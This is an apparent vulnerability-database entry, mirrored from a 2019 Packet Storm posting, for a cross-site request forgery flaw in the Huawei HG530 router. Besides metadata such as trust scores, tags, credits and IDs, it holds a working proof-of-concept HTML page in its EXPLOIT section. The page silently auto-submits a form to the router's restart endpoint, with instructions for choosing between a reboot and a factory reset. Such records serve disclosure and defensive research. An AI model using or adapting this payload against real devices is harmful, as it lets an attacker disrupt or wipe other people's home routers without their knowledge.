ID
VAR-E-201907-0172
TITLE
Huawei HG530 Cross Site Request Forgery
Trust: 0.5
DESCRIPTION
Huawei HG530 suffers from a cross site request forgery vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | huawei | model: | hg530 | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
Multiple CSRF reboot and restore Vulnerability
===========================
The Huawei HG530 suffers from multiple CSRF vulnerability allows local
attackers to reboot the device or to restore to factory Configuration.
==================
The vulnerability is located in form POST data parameter in
'Restart_factory' via path '/Forms/bottom_restart_1'
====================
Security issue PoC :
<html>
<FORM METHOD="POST" ACTION="http://192.168.1.1/Forms/bottom_restart_1"
id='test' >
<input type="hidden" name="defaltRomFlag" value="0">
<input type="hidden" name="defaultIpFactory" value="192.168.1.1">
<INPUT TYPE="hidden" NAME="Restart_factory" VALUE="1">
</form>
<script>
document.getElementById('test').submit();
</script>
</html>
//Change Value of 'Restart_factory' to 1 (to restore) or 0 to reboot
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
csrf
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | csrf | Trust: 0.5 |
CREDITS
Raki Ben Hamouda
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 153540 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 153540 |
LAST UPDATE DATE
2022-07-27T09:32:10.878000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 153540 | date: | 2019-07-06T22:12:12 |